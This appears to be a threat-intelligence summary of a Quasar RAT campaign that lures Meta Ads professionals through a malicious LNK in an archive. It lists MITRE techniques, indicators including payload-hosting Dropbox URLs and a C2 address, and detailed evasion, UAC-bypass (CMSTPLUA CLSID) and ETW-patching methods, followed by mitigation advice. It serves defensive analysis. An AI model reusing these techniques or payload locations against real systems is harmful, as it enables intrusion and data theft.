Keypoints
- Initial access is via a malicious .LNK inside an archive that likely arrives through phishing targeting Meta Ads professionals and job seekers.
- The LNK executes obfuscated PowerShell which downloads additional scripts from Dropbox and writes a lure PDF and a batch file to the victim’s Downloads folder.
- The attack performs extensive sandbox and virtualization checks (QEMU, VirtualBox, VMware, Sandboxie, Triage) plus multiple anti-debugging techniques to prevent analysis.
- Payloads are AES-encrypted and base64-encoded, decrypted only in memory, then decompressed and executed as a .NET assembly, which runs Quasar RAT with modified identifiers.
- Privilege escalation is attempted via PEB manipulation and PowerShell elevation with a fallback to CMSTPLUA COM UAC bypass; persistence is achieved through copying to C:Windows$rbx-onimai and creating a Registry Run key.
- Defense-evasion includes disabling ETW by patching EtwEventWrite in ntdll.dll and hiding/unhooking functions to avoid security telemetry and logging.
- CRIL attributes the campaign to a Vietnamese threat actor linked to prior campaigns (Ducktail) and observed use of additional families such as Stromkitty and MaaS delivery methods.
MITRE Techniques
- [T1566] Phishing – Delivered via archive containing the LNK file as phishing or spam emails. [‘The LNK file in a RAR archive may be delivered through phishing or spam emails.’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – The LNK executes obfuscated PowerShell commands to download and run remote scripts. [‘The LNK file executes PowerShell commands.’]
- [T1059.003] Windows Command Shell – Batch files use cmd.exe and WMIC/findstr to inspect the environment and control flow. [‘Uses cmd.exe to execute wmic and findstr commands.’]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Malware creates a Run registry entry to achieve persistence after reboot. [‘Added Run entry by modifying the Registry key.’]
- [T1218.003] CMSTP – CMSTPLUA COM object is used as a fallback UAC bypass to launch an elevated process. [‘CMSTPLUA is used for UAC bypass.’]
- [T1027.012] Obfuscated Files or Information: LNK Icon Smuggling – The LNK is disguised with a PDF icon to deceive victims. [‘LNK file comes with PDF Icon.’]
- [T1027.013] Obfuscated Files or Information: Encrypted/Encoded File – Payloads are AES-encrypted and base64-encoded, decrypted only in memory. [‘TA decrypts the payload using AES decryption.’]
- [T1562.001] Disabling Security Tools – The malware patches EtwEventWrite in ntdll.dll to disable event tracing and telemetry. [‘EtwEventWrite function in ntdll.dll is modified to disable event tracing.’]
- [T1497] Virtualization/Sandbox Evasion – Multiple checks detect QEMU, VirtualBox, VMware, Sandboxie, Triage, Wine, KVM, Hyper-V, and other analysis environments and abort execution if detected. [‘Checks for virtual environments (e.g., QEMU, VirtualBox, VMware, Sandboxie).’]
- [T1055] Process Injection – Decrypted payloads are invoked in-memory using Invoke-Expression, executing a .NET assembly without writing plaintext to disk. [‘Invoke-Expression is used to invoke decrypted payloads.’]
- [T1012] Query Registry – Scripts query registry keys and system WMI classes to collect configuration and environment information used in checks. [‘The script queries registry keys to gather system information for further checks, including checks related to virtualization.’]
- [T1082] System Information Discovery – Uses WMI (Win32_*) queries to collect disk, system, and OS edition details during sandbox and VM checks. [‘Using Windows Management Instrumentation Control gathers system information.’]
- [T1573] Encrypted Channel – Final-stage Quasar RAT uses encrypted channels (and earlier AES encryption) for C2 communications. [‘The final payload, Quasar RAT, establishes C2 communication over an encrypted channel (AES encryption used in earlier stages).’]
- [T1071] Application Layer Protocol – Quasar RAT communicates with its C2 over standard application-layer protocols such as HTTP. [‘After the payload is executed, the Quasar RAT communicates with its C2 server over standard HTTP or other application layer protocols.’]
Indicators of Compromise
- [SHA-256] Malware samples and archive – dc616cc55a345e448a058368aea7c99ab9dd2a9c8ec42674312b66dbc29b7878, 3de5e0b27c69c93b4c4b4812ed4453d4b81e99b7d407640a752e62e33b1ede2a, and 6 more hashes.
- [URL] Dropper/hosting locations – hxxps://www.dropbox.com/scl/fi/9p8no6tz85e09vg59kfwk/sav2_encrypt.txt?rlkey=hw7c83mq8uws216q3d4b1cfyi&st=4oycb9or&dl=1 (PowerShell payload host), and hxxps://www.dropbox[.]com/scl/fi/b9diosgl68vg9xlaytsbz/sav3_encrypt[.]txt?rlkey=k2ojylfvks6xyef3vb21n45gp&st=suprpdhv&dl=1 (additional payload).
- [IP/Host] Command-and-control – 144.76.68.248:4782 listed as a Quasar RAT host used in the campaign.
- [File names / artifacts] Lure and local artifacts – PositionApplied_VoyMedia.pdf, output.bat, Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.lnk (used as the initial lure), and PositionApplied_VoyMedia.rar.
Cyble Research and Intelligence Labs (CRIL) identified a targeted, multi-stage campaign that begins with a malicious .LNK file hidden inside an archive and aimed specifically at job seekers and digital marketing professionals, particularly those working with Meta Ads. The LNK executes a PowerShell one-liner which downloads a heavily obfuscated script from Dropbox; once retrieved, that script drops two base64-encoded components into the user’s Downloads folder—a lure PDF and a batch file—and launches them to continue the infection chain.
The batch file performs early environmental reconnaissance using WMIC to read disk and manufacturer strings and will exit immediately if it detects indicators of virtual machines such as QEMU, VirtualBox, or known Triage sandbox identifiers. If the system passes these checks, the batch triggers a de-obfuscated PowerShell routine that extracts two sets of base64 payloads from commented lines, decodes them, then AES-decrypts and GZip-decompresses the resulting blobs using hardcoded keys and IVs. The final output is an in-memory .NET executable invoked through PowerShell’s Invoke-Expression, avoiding writing the clear payload to disk.
That .NET loader performs a comprehensive battery of sandbox, virtualization, and debugging checks before executing its malicious payload. It queries WMI classes (Win32_DiskDrive, Win32_ComputerSystem, Win32_OperatingSystem) and inspects files, drivers, services, processes, device pipes, and desktop wallpaper bytes to spot emulation or analysis environments. Additional heuristics include measuring tick counts to detect emulation timing, matching the current username against a blacklist of typical sandbox/test accounts, searching for VM and hypervisor artifacts (drivers like balloon.sys or vboxguest files), and checking for analysis tool windows and process titles such as x32dbg, x64dbg, IDA, and Wireshark. If any check indicates an analysis environment, the loader throws an exception and halts execution.
Anti-debugging is equally layered: it leverages NtQueryInformationProcess and other native calls to spot attached debuggers, hides threads via NtSetInformationThread, uses PageGuard memory protections to trigger exceptions under debuggers, examines debug registers for hardware breakpoints, and attempts to neutralize debugger callbacks by overwriting DbgUiRemoteBreakin and DbgBreakPoint in ntdll. The code also contains routines that attempt to exploit or confuse debuggers (such as sending specially formatted OutputDebugString messages) and to detect kernel-level debugging, Secure Boot, Virtualization-Based Security (VBS), and memory integrity settings—aborting if the environment looks like a test bed.
To escalate privileges, the loader first checks whether it already has administrative rights. If not, it manipulates the Process Environment Block (PEB) to change the current process image and command line to resemble Explorer, then relaunches itself with PowerShell using “-Verb runas” in hidden mode. Should that approach fail, the malware uses the CMSTPLUA COM object (CLSID 3E5FC7F9-9A51-4367-9063-A120244FBEC7) with the “Elevation:Administrator!new:” prefix to invoke ShellExec as an alternative UAC bypass.
Once elevated, the malware establishes persistence by creating a hidden directory under C:Windows named $rbx-onimai and copying itself there as $rbx-CO2.bat, deleting the original from Downloads, and scheduling execution via a hidden Start-Process call through PowerShell. It also writes a Run key entry in SOFTWAREMicrosoftWindowsCurrentVersionRun with the name $rbx-XVR to ensure execution at login.
Defense-evasion routines include in-memory patching of EtwEventWrite in ntdll.dll to disable Windows event tracing (using RETN 20 on 32-bit or RET on 64-bit) and decrypting an encrypted resource (1789d7d0-48bf-48f5-bad6-e0262117d577.tmp) with AES followed by GZip decompression. The decrypted and decompressed payload is a modified Quasar RAT: the threat actor altered identifiers such as certificate names and strings to hinder attribution while configuring the RAT with a host, subdirectory, install name, mutex, startup key, and log directory suited to this campaign. The reported Quasar configuration points the RAT to 144.76.68.248:4782, uses a subdirectory named $cnt-onimai2, an install name $cnt-CO2.exe, and a mutex of 928569f3-e524-4f67-936e-0d7f0a47cfad.
CRIL links this operation to a Vietnamese threat actor that has previously targeted digital marketing professionals, initially with Ducktail in mid-2022 and later expanding to use additional information-stealers and RATs as well as Malware-as-a-Service to scale operations. The choice of lure documents, victim profile, tools, and delivery mechanisms mirrors prior campaigns attributed to the same group, and analysts observed related deliveries that include variants such as Stromkitty.
The campaign demonstrates several notable operational lessons: using a benign-looking LNK inside an archive as the initial vector to lower suspicion, staging payloads across multiple encoded/encrypted layers so they only appear in cleartext in memory, and implementing a broad set of environment and debugger checks so the malware runs only on likely real, unmanaged hosts. By combining PEB manipulation, CMSTPLUA fallback elevation, ETW disabling, and in-memory execution of a modular Quasar RAT, the threat actor maximizes stealth, persistence, and post-compromise control.
To reduce exposure to similar campaigns, organizations should harden email filtering to detect and quarantine archive attachments containing LNK files, restrict PowerShell script execution via signed-only policies and logging, monitor for unusual PowerShell and cmd.exe parent-child relationships, deploy behavioral EDR that flags in-memory execution and ETW patching, limit user privileges to the minimum required, and ensure systems and endpoint protection are fully patched and centrally managed.